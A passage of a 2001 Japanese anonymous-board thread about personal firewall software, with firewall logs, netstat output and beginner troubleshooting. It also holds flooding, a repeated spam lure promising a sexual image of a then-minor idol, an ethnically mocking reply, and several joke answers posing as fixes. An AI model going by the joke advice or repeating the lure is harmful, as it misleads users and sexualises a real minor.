   ̄ ̄ ̄~|/  \/ ̄ ̄/      \/ ̄ ̄ /  /       /      /   /
              ̄ ̄ ̄          ̄ ̄ ̄                    ̄ ̄ ̄
   /|
  _| .|__     _____   ____              ___/
/  |/  /|  /     /| ∠____/|    /| /|     /__/
 ̄ ̄| ̄| ̄| |   ̄ ̄ ̄ ̄|  | |/     | .|   |  | | |     ̄ |  |
    |/  .| |        | .|        |/   |/  |/\     |  |
  /  /|/  / ̄ ̄ ̄|/       /   /   \/     |/
      ̄     ̄ ̄ ̄ ̄
337名無しさん@お腹いっぱい。:2001/07/17(火) 22:12
sageの書き込みの方が無意味だよ
どうせ上がるのに(藁
338名無しさん@お腹いっぱい。:2001/07/17(火) 22:13
無意味だと思うならどっか他に逝けば?
339名無しさん@お腹いっぱい。:2001/07/17(火) 22:14
生で全員にふしあなして欲しい気分
340名無しさん@お腹いっぱい。:2001/07/17(火) 22:14
       / ̄ ̄ ̄ ̄ ̄
 冫、  <  無意味な書き込み
 `     \_____
341名無しさん@お腹いっぱい。:2001/07/17(火) 22:15
ここから100レス以上は無意味な書き込みが続く模様
それもまた面白い
342名無しさん@お腹いっぱい。:2001/07/17(火) 22:15
でもageは一気に上まで上がるけど、sageで書き込んでも
下がらないんだからどっちが無意味かと言われると・・・
343名無しさん@お腹いっぱい。:2001/07/17(火) 22:15
ふざけんなよ!お前等!!
344名無しさん@お腹いっぱい。:2001/07/17(火) 22:16
ここからしばらくは雑談スレと言うことで
345名無しさん@お腹いっぱい。:2001/07/17(火) 22:16
わかった。俺たち夏厨が悪かった。君の言い分は全面的に正しいよ

> 2001-07-17 12:27:08 GMT
> By 152.94.60.66 (INFOPC2 )
> Attack #2003102: TCP port probe
> Port information: port=6699&reason=Firewalled
> Attack count: 1044
> Attack result: Blocked
> Attacker's DNS Name: INFOPC2
> Attacker's NETBios Name: LASSE 
> Attacker's MAC Address: 000102A36938
> Attacker's Machine Name: INFOPC2
> Attacker's Group: SAMSKIPNADEN

>もう1000回以上連打してる


これはアタック、紛れも無いアタックです。
346名無しさん@お腹いっぱい。:2001/07/17(火) 22:17
はい無事解決

って事でfwの話に戻りましょう
347名無しさん@お腹いっぱい。:2001/07/17(火) 22:17

しきり直し
348名無しさん@お腹いっぱい。:2001/07/17(火) 22:17
しきり直し
349名無しさん@お腹いっぱい。:2001/07/17(火) 22:17
しきり直し 
350名無しさん@お腹いっぱい。:2001/07/17(火) 22:17
しきり直し
351名無しさん@お腹いっぱい。:2001/07/17(火) 22:17
しきり直し
352名無しさん@お腹いっぱい。:2001/07/17(火) 22:17
しきり直し
353名無しさん@お腹いっぱい。:2001/07/17(火) 22:18
しきり直し
354名無しさん@お腹いっぱい。:2001/07/17(火) 22:18
しきり直し  
355名無しさん@お腹いっぱい。:2001/07/17(火) 22:18
しきり直し  
356名無しさん@お腹いっぱい。:2001/07/17(火) 22:18
しきり直し    
357名無しさん@お腹いっぱい。:2001/07/17(火) 22:18
しきり直し
358名無しさん@お腹いっぱい。:2001/07/17(火) 22:18
しきり直し
359名無しさん@お腹いっぱい。:2001/07/17(火) 22:18
しきり直し
360名無しさん@お腹いっぱい。:2001/07/17(火) 22:18
しきり直し
361名無しさん@お腹いっぱい。:2001/07/17(火) 22:18
しきり直し
362名無しさん@お腹いっぱい。:2001/07/17(火) 22:18
プ
こんどは荒らしか
363名無しさん@お腹いっぱい。:2001/07/17(火) 22:18
しきり直ししすぎました
364名無しさん@お腹いっぱい。:2001/07/17(火) 22:18
そそ
荒らしだよ
しきり直し
365名無しさん@お腹いっぱい。:2001/07/17(火) 22:19
自演のうちはまだ可愛かったが、セキュ板でDUKE撃つとはね・・・
366名無しさん@お腹いっぱい。:2001/07/17(火) 22:19
「彼」が寝るまでこの調子でしょうな
367名無しさん@お腹いっぱい。:2001/07/17(火) 22:20
まだなんかぼやいてます
368名無しさん@お腹いっぱい。:2001/07/17(火) 22:21
眠いなあ
369名無しさん@お腹いっぱい。:2001/07/17(火) 22:22
一番上にあるときはsageしても意味無いよ
370名無しさん@お腹いっぱい。:2001/07/17(火) 22:23
ひまんこ
371名無しさん@お腹いっぱい。:2001/07/17(火) 22:23
これもお前だろ?>荒らし
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
372名無しさん@お腹いっぱい。:2001/07/17(火) 22:23
5 名前:名無しさん@お腹いっぱい。 投稿日:2001/06/04(月) 19:00
荒らされないよう、とりあえずsageときな。

セキュリティがなってねえぞ!




そうか、上げると荒らされるのか
なるほど
373名無しさん@お腹いっぱい。:2001/07/17(火) 22:24
荒らされても別に構わないからいいや(藁
374名無しさん@お腹いっぱい。:2001/07/17(火) 22:25
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
これ荒らし君のHPだってさ!
375名無しさん@お腹いっぱい。:2001/07/17(火) 22:26
ちんちん
376名無しさん@お腹いっぱい。:2001/07/17(火) 22:26
フレッツABCD
377名無しさん@お腹いっぱい。:2001/07/17(火) 22:26
ひまだから相手してくれ
ちんちん
378名無しさん@お腹いっぱい。:2001/07/17(火) 22:27
|
|⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡
|冫、)` / 冫、)` / 冫、)` / 冫、)` / 冫、)` / 冫、)
|` /⌒彡 ` /⌒彡 ` /⌒彡 ` /⌒彡 ` /⌒彡 ` /
|⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡
|冫、)` / 冫、)` / 冫、)` / 冫、)` / 冫、)` / 冫、)
|` /⌒彡 ` /⌒彡 ` /⌒彡 ` /⌒彡 ` /⌒彡 ` /
|⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡
|冫、)` / 冫、)` / 冫、)` / 冫、)` / 冫、)` / 冫、)
|` /⌒彡 ` /⌒彡 ` /⌒彡 ` /⌒彡 ` /⌒彡 ` /
|⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡
|冫、)` / 冫、)` / 冫、)` / 冫、)` / 冫、)` / 冫、)
|` /⌒彡 ` /⌒彡 ` /⌒彡 ` /⌒彡 ` /⌒彡 ` /
|⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡
|冫、)` / 冫、)` / 冫、)` / 冫、)` / 冫、)` / 冫、)
|` /⌒彡 ` /⌒彡 ` /⌒彡 ` /⌒彡 ` /⌒彡 ` /
|⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡
|冫、)` / 冫、)` / 冫、)` / 冫、)` / 冫、)` / 冫、)
|` /⌒彡 ` /⌒彡 ` /⌒彡 ` /⌒彡 ` /⌒彡 ` /
|⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡
|冫、)` / 冫、)` / 冫、)` / 冫、)` / 冫、)` / 冫、)
|` /⌒彡 ` /⌒彡 ` /⌒彡 ` /⌒彡 ` /⌒彡 ` /
379名無しさん@お腹いっぱい。:2001/07/17(火) 22:28
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と!加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
380名無しさん@お腹いっぱい。:2001/07/17(火) 22:29
サンキュ
381名無しさん@お腹いっぱい。:2001/07/17(火) 23:46
もう消えてるみたいです
382名無しさん@お腹いっぱい。:2001/07/18(水) 05:31
なんだこの消防は
383名無しさん@お腹いっぱい。:2001/07/19(木) 02:18
以前ぞねと黒氷同時に使うことには意味があるって見たことあるけど・・(ここでだっけかな?)。
かんきょー的に(つーか遅いだけ・・・泣)1つしかつかえんなら・・・
さーDOTCH。
つーかネタっぽいけどゴメンして・・
384名無しさん@お腹いっぱい。:2001/07/19(木) 02:20
ぞぬの方が大分マシ。以上
385名無しさん@お腹いっぱい。:2001/07/19(木) 03:49
>384
thanks
386名無しさん@お腹いっぱい。:2001/07/19(木) 04:03
プロキシーについて教えてってのはダメですか?
387(¬_¬) :2001/07/19(木) 07:12
| C:\>netstat -na
|
| Active Connections
|
| Proto Local Address Foreign Address State
| TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
| TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
| TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
| TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING
| TCP 0.0.0.0:1028 0.0.0.0:0 LISTENING
| UDP 0.0.0.0:135 *:*
| UDP 0.0.0.0:445 *:*
| UDP 0.0.0.0:1027 *:*
| UDP 127.0.0.1:1355 *:*

NISで上記のポートは全部塞いであるはずなのに、
なんで LISTENING て出るんですか。
W2K SP1 + IE5.01 SP2 です。
388ドキンちゃん:2001/07/19(木) 09:49
>>386
ここを読むと良いよ。
http://www8.big.or.jp/~000/CyberSyndrome/
389名無しさん@お腹いっぱい。:2001/07/19(木) 18:29
偽串を立てたら、ここで宣伝すればいいってわけだ。
390名無しさん@お腹いっぱい。:2001/07/19(木) 22:00
>>389
何がしたいの?(藁
391名無しさん@お腹いっぱい。:2001/07/19(木) 22:48
>>390
あの手のページの正しい使い方を教えてあげただけだ。
勉強になったか?
392(¬_¬) @387:2001/07/20(金) 00:59
だ、誰か・・・
393名無しさん@お腹いっぱい。:2001/07/20(金) 01:03
質問!!
今まで、BlackICEの体験版を使ってきた初心者です。
今日、BlackICEの体験版の期限がきたので、他に何か簡単でいいファイヤーウォールがないか調べにきました。
といことで、何がいいですか?
ちなみに当方は英語は中学生レベルのものでも、よくわかりません(おぃ
あと、Promitronを使っていても使えるのがいいです。

ここまでのログを読んでみて
Sygate Personal Firewall
Tiny Personal Firewall
ZoneAlarm
が人気があるみたいなのですが、
Sygateの日本語化パッチってどこにあります?
394名無しさん@お腹いっぱい。:2001/07/20(金) 01:08
無い
395名無しさん@お腹いっぱい。:2001/07/20(金) 01:10
>>394
無いんですか(w
じゃあ、おとなしくZoneAlarmかTinyを使うことにします。
396名無しさん@お腹いっぱい。 :2001/07/20(金) 01:10
Sygateの日本語化パッチはないです。
397名無しさん@お腹いっぱい。:2001/07/20(金) 01:20
ところで、>>387さんがやっているようにMSDOSで「netstat -na」ってコマンドを使ってみたら、
TCP 127.0.0.1:2973 0.0.0.0:0 LISTENING
UDP 127.0.0.1:2973 0.0.0.0:0 LISTENING
UDP 自分のIP    *.*
UDP 自分のIP *.*
って表示されたんですが、これってやばいですかね。

ちなみにPromitronであけてあるローカルホスト(127.0.0.1)のポートも表示されてましたが、2973なんて開けた覚えがありません。
あと、UDP 自分のIP *.* ってなんですか?

今日、ウィルスバスターの会社のオンラインウィルススキャンをしたばっかりだからトロイはないと思いますけど・・・・
398393:2001/07/20(金) 04:02
うあ〜どうしよう!!
TINYを導入したら、何だか侵入されるソフト(トロイ)が仕込まれてるって分かったよ。

a5-0-1.tokyo-n1.bbn.web.ad.jp(133.160.245.2)←こいつ

netstat -naをしてみたら

0.0.0.0:44334というポートが開いていて、
Local Address ForeginAddress
127.0.0.1(ポートは秘密)    127.0.0.0:44334
になっていて

ping 127.0.0.0:44334と打つと
tcpip kernel driver←これを遮断しますかってでて、そこに
a5-0-1.tokyo-n1.bbn.web.ad.jp(133.160.245.2) このIPが乗っていたんだよ。
接続しなおしてもトロイっぽいから常に奴と接続されているし・・・

こいつの使っているプロバイダを教えてください!!

http://www.mse.co.jp/にあるIPドメインサーチからでは僕の環境では検索結果が表示されませんでした
誰かお願い!!
399393:2001/07/20(金) 04:06
ウィルスバスターの会社のオンラインウィルススキャンをしてもウィルスは検索されないし、
アンチトードでウィルス検索してもウィルスは検索されないのに・・・
ちなみにBlackICEでは全然気がつかんかった!!
TINYのおかげだ(T_T)
400393:2001/07/20(金) 04:30
PC JAPNANのCDにのっていたInter Net test TOOLのルート追跡で
a5-0-1.tokyo-n1.bbn.web.ad.jp(133.160.245.2)このIPが
kure001n.ppp.web.ad.jp最終的にここからでていることがわかったよ。
こいつ誰?(涙)
パスワードとか盗まれまくってたのか・・・鬱だ。
401393:2001/07/20(金) 04:50
なんか、自分のプロバイダっぽい気がしてきた(おぃ
402名無しさん@お腹いっぱい。:2001/07/20(金) 05:18
・・・・・・
まぁどっちにしろ黒氷はアウトバウンド一切教えてくれないからね・・・
それを知った上で使うべきだけど・・・
403名無しさん@お腹いっぱい。:2001/07/20(金) 08:56
ネットに接続する時tcpip karnel driverが3回アウトバウンドで何かを送信したがるんですが
これって何をしてるんでしょうか?遮断しても一応つながるんですが・・・
404名無しさん@お腹いっぱい。:2001/07/20(金) 13:04
Win2000 SP2で、ネット接続はISDNなんですが
Tiny Personal Firewallを、今日初めてインストールしてみました。
最初のうちは、順調でしたが
そのうち、リストにないプログラムを起動してもなにも聞いてこなくなり
その後、Tinyを終了しても、アンインストールしても
外のネットワークに接続することが、全くできなくなりました。
(WWW, メール, FTP, Ping, Telnet 等、全て不可。)
ローカル(同一マシン内)のWWWサーバーには接続できるし
ダイアルアップ接続によって、プロバイダから割り当てられた
IPアドレスへのPingは通ります。

一体、どうなったんでしょう?
心当たりのある方は、教えてください! 困った・・・。
(これは、サブの、しょぼいノートから書いてます。)
405名無しさん@お腹いっぱい。:2001/07/20(金) 15:03
>>404
もう一回Tinyをインストールして、ルールを全部削除してみたら
どうでしょう。それと、ファイアーウォールの設定がAsk Me Firsit
になっているかも確認してみてはいかかでしょうか。
406404:2001/07/20(金) 20:31
>>405
ありがとうございます!
再インストールして、ルールを全部削除したら
全てうまくいきました。とても助かりました。

インストール後、再起動すると
NetBIOS関係のポートをどうするか聞いてきて
10くらい、自動的にルールができていますが
それらが原因、ってことなのかな?

あと、使い続ける以上はどうでもいいことですが
アンインストール後も、Tiny Personal Firewall というフォルダが
共有違反で削除できないのが、ちょっと気になりました。
407名無しさん@お腹いっぱい。:2001/07/20(金) 21:05
>>406
再起動すりゃ直るだろ?
408名無しさん@お腹いっぱい。:2001/07/20(金) 21:49
>>406
NetBIOSについては、ここをみてちょ

http://www.personalfirewalljapan.com/explanation/bios.htm
409404:2001/07/21(土) 01:19
>>407
いやそれが、再起動しても、ダメだったんで・・・。
まぁ、あまり深く追求しないことにします。

>>408
ありがとう。読んどきます。
410名無しさんに接続中… :2001/07/25(水) 09:02
ZoneAlert常駐させたらクッキーを弾くようになったので、
2chに書き込めません。どうしたらよいのでしょうか?
FWソフト自体にクッキー受け入れる設定は無いみたいなので。
初心者でスマソ
411名無しさんに接続中…:2001/07/25(水) 09:25
あれれ初心者板のほうだったかな。
412名無しさんに接続中…:2001/07/25(水) 09:26
あれれ、今FW常駐で書き込めたぞ。
そうか、レベルを「中」にすればいいのか!
「高」が厳しすぎるのだな。
ふむふむ、勉強になった。
413名無しさんに接続中…:2001/07/25(水) 09:27
test
414名無しさんに接続中…:2001/07/25(水) 09:29
test2
415名無しさん@お腹いっぱい。:2001/07/25(水) 10:01
クッキーとfw関係あるはずないだ炉・・・
416名無しさん@お腹いっぱい。:2001/07/25(水) 11:11
>>410
ZoneAlertって何?

>>415
ノートンなら関係あると思うが・・・
417名無しさん@お腹いっぱい。:2001/07/25(水) 11:41
まぁ、プライバシー制御とファイアウォール機能は別物だからね。
418404:2001/07/25(水) 12:08
プロバイダによって、外に出れるときと出れないときがあることが、判明しました。
使ってる3つのうち、2つは全く問題なしですが、1つは全然外に出られません。
理由なんて、サポートに聞いても、教えてくれない(あるいは、わからない)だろうなぁ・・・。
419名無しさん@お腹いっぱい。:2001/07/25(水) 12:17
ZoneAlertってZoneAlarmの旧名?
検索したらZone Labsに繋がるし。
420名無しさん@お腹いっぱい。:2001/07/26(木) 13:33
ポートスキャンしてくれるサイトとか知ってますか?
421名無しさん@お腹いっぱい。:2001/07/26(木) 13:34
アホ?
自分でしなさい
422名無しさん@お腹いっぱい。:2001/07/26(木) 13:40
423名無しさん@お腹いっぱい。:2001/07/26(木) 14:20
cgi1.ug5150.com/portscan.cgi
424名無しさん@お腹いっぱい。:2001/07/26(木) 14:21
425名無しさん@お腹いっぱい。 :2001/07/27(金) 16:17
>>424
ソノトオリ
426名無しさん@お腹いっぱい。:2001/07/28(土) 00:53
Sygate Personal Firewall って日本語パッチなにの?
427名無しさん@お腹いっぱい。:2001/07/28(土) 00:55
無い
428名無しさん@お腹いっぱい。:2001/07/28(土) 00:58
使えないね
アンインストーーーーーーール
429名無しさん@お腹いっぱい。:2001/07/28(土) 01:11
かなりアホですな
430ひよこ:2001/07/28(土) 11:26
ZoneAlarmを使っているのですが、ローカルコンピューターに
アクセスできなくなりました。何処で設定すればよいのですか?
431 :2001/07/28(土) 12:37
ZoneLog Analyser
の日本語パッチってない?
432 :2001/07/28(土) 12:40
>>430
セキュリティのローカルの右下のチェックを外せ。
日本語パッチインストールすれば、簡単に設定できる。
日本語パッチは、>>2にあるだろ。
433ひよこ:2001/07/28(土) 12:42
>432
さんくす!!
434あいぼん:2001/07/28(土) 12:51
ゾヌゥ、インストールして24時間たったけど、なんもアラームならないな。
ルーターでみんな止まってるのか・・。
435ここにも貼ります…:2001/07/28(土) 13:47

セキュリティの達人にお聞きします…

今日、Windows2000いれました。ヘルプを見ながら、ネットワーク
とプリンタの共有を削除したら、プロパティの共有窓が消えました。
これって良く判らないのですが万全のセキュリティ対策になったと
云うことなんでしょうか。。。
436名無しさん@お腹いっぱい。:2001/07/28(土) 14:19
>>435
> 今日、Windows2000いれました。ヘルプを見ながら、ネットワーク
> とプリンタの共有を削除したら、
やり方教えてキボンヌ
437435:2001/07/28(土) 14:34

>>436

私も本題レスの待ち人です…

Windows2000のヘルプを参照し、$共有 共有ドライブの保護を
表示してその通りに、やってみてください。

※435の質問は、何のこっちゃ?判らなくなったので、貼りました。
438名無しさん@お腹いっぱい。:2001/07/28(土) 14:34
IRCつなげるときに、ノートン博士がauthとsocks全部ブロックして
つながるまでに時間がかかるんだよね
FireWall規則で通るようにしたのに博士はブロックをやめないんだよな
ノートン使ってる人IRCすんなりつなぐ方法おしえてー
439名無しさん@お腹いっぱい。:2001/07/28(土) 14:37
>>438 Norton先生 一時解除!!!
440 :2001/07/28(土) 16:58
ノートンなんて使うなよ。
俺はウィルスバスター+ぞぬ
441名無しさん@お腹いっぱい。:2001/07/28(土) 17:16
ワラタ
442名無しさん@お腹いっぱい。:2001/07/30(月) 15:42
質問させてください。
ゾーンアラームの日本語化パッチ当ててるんですけど、PC起動時に、VSMONが
原因でVSMON,DLLにエラーが発生しましたVSMONは終了します。というメッセージが
でて、ゾヌが起動出来なくなりました。今まで問題なく起動出来てたのに何故?
どなたかご教授お願いします。
443名無しさん@お腹いっぱい。:2001/08/02(木) 02:53
ZoneAlermと、オミトロン一緒に使える?
設定しないといけないの?
それとどういう状況なんだろう?
PC ->Firewall->Proxy?
PC->Proxy->Firewall
444名無しさん@お腹いっぱい。 :2001/08/02(木) 04:42
>>443
つーかZAはlocalproxyじゃないんだけど・・
445ななしさん@おなかいぱーい:2001/08/02(木) 09:26
日本語化パッチとか当てるなって。
弱すぎ。
446名無しさん@お腹いっぱい。:2001/08/02(木) 09:42
他でも見たけどなんかproxomitronとfwが一緒に使えない?って言う人多いね。全然関係ないんだけど。
まぁサーバー権限を与える事を設定というならば設定が必要とも言えるかもしれないが。
447名無しさん@お腹いっぱい。:2001/08/05(日) 07:05
ZoneAlermのPROGRAMSのところに、
ファイルサイズが0の名前が書いてないプログラムがあるんだけど、
これってなに?
448 :2001/08/05(日) 07:07
>>447
ホワイトベースです。
ネット接続の許可をOKしましょう。
449名無しさん@お腹いっぱい。:2001/08/05(日) 12:40
ホワイトベースってなんですか?
450名無しさん@お腹いっぱい。:2001/08/05(日) 13:02
>>449
ヒント!ガンダム
451名無しさん@お腹いっぱい。:2001/08/05(日) 13:04
>>449
ヒント2!ファースト
452名無しさん@お腹いっぱい。:2001/08/05(日) 22:49
>>449 木馬やないか!( ̄□ ̄;)!!
453:2001/08/06(月) 00:56
野球場にあるやつじゃないの?
454:2001/08/06(月) 01:03
そらホームベースや!
455名無しさん@お腹いっぱい。:2001/08/06(月) 03:32
あげときましょう
456449:2001/08/06(月) 11:00
ウイルスソフトでも引っかからないんですけど、
どうやって駆除すればいいですか?
457名無しさん@お腹いっぱい。:2001/08/06(月) 14:49
パブロンゴールドが効くらしいぞ。
それも顆粒がいい。
458名無しさん@お腹いっぱい。:2001/08/07(火) 00:40
一週間くらい前からポート80を五分間隔くらいで毎回違うIPからアクセス
されるのですが、何が原因なのでしょうか?ちなみに私はNTTのフレッツADSL
です。
459名無しさん@お腹いっぱい。:2001/08/07(火) 00:51
>>458
たいへんだ!まだ、対策をこうじていない人がいたんだ!
それはCodeRedっていうウィルスに感染しているんですよ。
このウィルスは凶悪なので、すぐにOSの再インストールし、
以後はNetに繋がないことをおすすめします。
早くしないと、大変なことになっちゃうYO!
460名無しさん@お腹いっぱい。:2001/08/07(火) 01:12
>>458
ネタの餌食に鳴る前にコード・レッド版逝け。
461:2001/08/08(水) 04:59
かつての板違いスレッドも、あるべき板へ定着したようだな。
462名無しさん@お腹いっぱい。:2001/08/08(水) 06:48
>>461
氏ね
463名無しさん@お腹いっぱい。:2001/08/09(木) 22:41
>>462
荒しは触らず・騒がず・相手せず、ですよん。
464名無しさん@お腹いっぱい。:2001/08/10(金) 07:27
211.103.56.46 (TCP Port 3520) [TCP Flags: S].
210.241.20.2 (TCP Port 4837) [TCP Flags: S].
210.160.99.130 (TCP Port 1072) [TCP Flags: S]. ns.it.iwasakinet.co.jp
210.109.62.98 (TCP Port 4476) [TCP Flags: S].
210.85.112.184 (TCP Port 3767) [TCP Flags: S]. 184.c210-85-112.ethome.net.tw
210.179.226.130 (TCP Port 3166) [TCP Flags: S].
210.216.153.20 (TCP Port 1939) [TCP Flags: S].
210.223.208.15 (TCP Port 4220) [TCP Flags: S].
210.85.17.20 (TCP Port 1193) [TCP Flags: S].
210.202.176.133 (TCP Port 2599) [TCP Flags: S].
210.95.63.197 (TCP Port 4738) [TCP Flags: S].
210.127.189.214 (TCP Port 4136) [TCP Flags: S].
210.91.86.98 (TCP Port 1807) [TCP Flags: S].
210.90.69.184 (TCP Port 1996) [TCP Flags: S].
157.252.230.12 (TCP Port 1963) [TCP Flags: S].
210.126.249.8 (TCP Port 1199) [TCP Flags: S].
210.105.70.120 (TCP Port 3049) [TCP Flags: S].
210.205.6.251 (TCP Port 1587) [TCP Flags: S].
210.166.201.105 (TCP Port 3541) [TCP Flags: S].
210.85.172.184 (TCP Port 1877) [TCP Flags: S].
210.75.52.217 (TCP Port 4486) [TCP Flags: S].
211.62.59.2 (TCP Port 2223) [TCP Flags: S].
210.77.216.51 (TCP Port 2998) [TCP Flags: S].
210.36.99.10 (TCP Port 1048) [TCP Flags: S].
210.15.12.18 (TCP Port 4474) [TCP Flags: S].
210.85.43.47 (TCP Port 4010) [TCP Flags: S].
210.111.45.211 (TCP Port 4782) [TCP Flags: S].
210.225.54.120 (TCP Port 2500) [TCP Flags: S].
212.143.20.146 (TCP Port 4405) [TCP Flags: S].
210.98.100.117 (TCP Port 1345) [TCP Flags: S].
465名無しさん@お腹いっぱい。:2001/08/12(日) 11:57
tinyのVersion2.0.15β2用はいったいどこから落とせるんだYO!!!
日本語化パッチがあっても、本体が無いとどうにもならないYO!!!
466783-640:2001/08/12(日) 12:05
>>465
ここの下の「Tiny Yahoo Groupのお知らせ」を見てみろYO!!!!!!!!!!!!!!!!
http://members.tripod.co.jp/eazyfox/Firewall/Tiny/TinyPFW3.htm
467名無しさん@お腹いっぱい。:2001/08/12(日) 14:38
Secure Designで久しぶりにチェックしてみたんだけど・・・・・。
10分くらいの間に5000回って、おいっ!!!
468名無しさん@お腹いっぱい。:2001/08/13(月) 13:41
>>466
よく分からないけど、アーカイブは手に入ったYO!!
サンクスだYO!!
469名無しさん@お腹いっぱい。:2001/08/14(火) 00:09
61.203.0.0-61.203.127.0
470名無しさん@お腹いっぱい。:2001/08/14(火) 16:46
教えて君でスマソ
火壁用にブロバンルータの購入検討中。
今はフレッツADSLだけど、ヤフも申し込んでいて、両方で使える
ヤツが欲しいのよ。お奨めありますか?
それから、Ipv6対応てヤツもあるけど、どんなメリットがありま
すか?
471名無しさん@お腹いっぱい。:2001/08/14(火) 17:30
472名無しさん@お腹いっぱい。:2001/08/14(火) 17:31
473名無しさん@お腹いっぱい。:2001/08/15(水) 00:56
誰か助けてください。
韓国からのハッカーがうちのPCを乗っ取ってる見たいです。
もうすでにnetbiosとhttpが破壊されました。
どうすればよりのでそうか?
474名無しさん@お腹いっぱい。:2001/08/15(水) 01:13
>>473
過去についての謝罪と反省をしなさい
475名無しさん@お腹いっぱい。:2001/08/15(水) 01:44
>>473
ディスクスキャンとデフラグをしてください。
476名無しさん@お腹いっぱい。:2001/08/15(水) 01:47
転載
ttp://homepage2.nifty.com/rohizuka/pa/pa_003_a.htm
あるコテハンの...
477名無しさん@お腹いっぱい。:2001/08/15(水) 02:19
>>475
スキャンディスクでわ
478名無しさん@お腹いっぱい。:2001/08/15(水) 02:26
最近APNICから激しく来ている。
何なんだ。
富士通も毎日来る。
479名無しさん@お腹いっぱい。:2001/08/15(水) 02:41
最近素で、ポートスキャンのことをハッキングされたとかPC覗かれたとか言ってる奴
がいるような気がするんだが、夏だからか?
480名無しさん@お腹いっぱい。:2001/08/15(水) 03:15
素だよ
>473
ネットワークから外してフォーマット後OS再インストール。
データーは汚染されているかもしれないので全部あきらめる。
netbiosとhttpを止めてからネットワークに再接続。
482なー:2001/08/15(水) 11:23
>>478
逆引きドメインをapnicが管轄してるだけでapnicが悪さしてる訳じゃないよ。
483478:2001/08/15(水) 15:18
>>482
Tnx
じゃあ、富士通もそうなのかな。
ZAのログに山ほど記録されてうるさくてしょうがない。
484名無しさん@お腹いっぱい。:2001/08/15(水) 18:33
>>481
http止めて大丈夫なのか?

>473 に似た人がASAHIネットスレに居たな・・・

>ブラックアイスのメッセージなんですけど

>アタッカは自身のエントリでDNSキャッシュを破壊しています。
>これによってトラフィックを別のサイトにリダイレクトさせることが
>できます。
>>476
バカヤロー、ドキッとしたじゃねぇか
486名無しさん@お腹いっぱい。:2001/08/16(木) 04:21
>>476
どっか逝け。ヴァカ野郎。
